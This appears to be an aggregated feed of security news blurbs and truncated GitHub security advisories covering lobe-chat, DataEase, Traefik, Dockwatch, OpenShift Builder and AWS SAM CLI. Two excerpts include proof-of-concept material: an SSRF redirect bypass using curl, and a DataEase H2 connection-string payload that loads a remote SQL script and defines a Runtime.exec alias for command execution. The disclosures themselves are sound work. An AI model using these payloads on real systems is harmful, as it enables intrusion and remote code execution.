


Moving DevOps Security Out of 'the Stone Age'

Developers need to do more than scan code and vet software components, and ops should do more than just defend the deployment pipeline.

Moving DevOps Security Out of the 'Stone Age'

Developers need to do more than scan code and vet software components, and ops should do more than just defend the deployment pipeline.

Harnessing the Power of Cloud App Development and DevOps for Modern Businesses

Leverage Cloud App Development and DevOps to boost business agility, scalability, and security. Optimize operations, deploy faster, and…

GHSA-3fc8-2r3f-8wrg: lobe-chat implemented an insufficient fix for GHSA-mxhq-xw3g-rphc (CVE-2024-32964)

### Summary SSRF protection implemented in does not consider redirect and could be bypassed when attacker provides external malicious url which redirects to internal resources like private network or loopback address. ### PoC 1. Run lobe-chat in docker container. In my setup lobe-chat runs on; 2. Create file dummy-server.js with the following content: ``` var http = require('http'); console.log("running server"); http.createServer(function (req, res) { console.log(req.url); res.writeHead(200, {'Content-Type': 'text/html'}); res.end(); }).listen(3001, 'localhost'); ``` And run ``` node dummy-server.js ``` as an example server inside of container [1] (or in containers private network). 3. Run in terminal to perform request to lobe-chat instance from [1] ``` curl --path-as-is -i -s -k -X $'POST' \ -H $'Host:' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0....

GHSA-h7mj-m72h-qm8w: DataEase's H2 datasource has a remote command execution risk

### Impact An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string. request message: ``` POST /de2api/datasource/validate HTTP/1.1 Host: dataease.ubuntu20.vm User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close X-DE-TOKEN: jwt Content-Length: 209 Content-Type: application/json { "id": "", "name": "test", "type": "h2", "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ==" } ``` h2 data source connection string: ``` // configuration { "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '['](;", } ``` the content of poc.sql: ``` // poc.sql CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws {Runtime.getRuntime().exec(cmd);return "su18";}';CA...

GHSA-62c8-mh53-4cqv: HTTP client can manipulate custom HTTP headers that are added by Traefik

### Impact There is a vulnerability in Traefik that allows the client to remove the X-Forwarded headers (except the header X-Forwarded-For). ### Patches - - ### Workarounds No workaround. ### For more information If you have any questions or comments about this advisory, please [open an issue]( <details> <summary>Original Description</summary> ### Summary When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in ...

Dockwatch Remote Command Execution

Dockwatch is a container management web UI for docker. It runs by default without authentication, although guidance is available for how to setup credentials for access. It has a Commands feature that allows a user to run docker commands such as inspect, network, ps. Prior to fix, it did not restrict input for parameters, so both container and parameters for the dockerInspect command were vulnerable to shell command injection on the container as the abc user with (limited) command output. See commits 23df366 and c091e4c for fixes.

GHSA-qqv8-ph7f-h3f7: OpenShift Builder has a path traversal, allows command injection in privileged BuildContainer

A flaw was found in openshift/builder. This vulnerability allows command injection via path traversal, where a malicious user can execute arbitrary commands on the OpenShift node running the builder container. When using the "Docker" strategy, executable files inside the privileged build container can be overridden using the `spec.source.secrets.secret.destinationDir` attribute of the `BuildConfig` definition. An attacker running code in a privileged container could escalate their permissions on the node running the container.

Hackers Proxyjack &amp; Cryptomine Selenium Grid Servers

A vendor honeypot caught two attacks intended to leverage the tens of thousands of exposed Selenium Grid Web app testing servers.

GHSA-rjc6-vm4h-85cg: Sensitive Information Exposure Through Insecure Logging For Secrets Like Metadata.DockerBuildArgs

### Summary The AWS Serverless Application Model (SAM) CLI is an open source tool that allows customers to build, deploy and test their serverless applications built on AWS. AWS SAM CLI can build container (Docker) images and customers can specify arguments in the SAM template that are passed to the Docker engine during build [1]. ### Impact If customers specify sensitive data in the DockerBuildArgs parameter of their template, the sensitive data will be shown in clear text in the AWS SAM CLI output via STDERR when running the sam build command. ### Patches A patch is included in aws-sam-cli>=1.122.0. We strongly recommend customers install AWS SAM CLI v1.122.0 or above. Please review logs produced by your SAM CLI runs if you have used the DockerBuildArgs parameter and consider rotating the secrets if you believe they were exposed. ### References If you have any questions or comments about this issue, we ask that you contact AWS/Amazon Security via our vulnerability reporting page...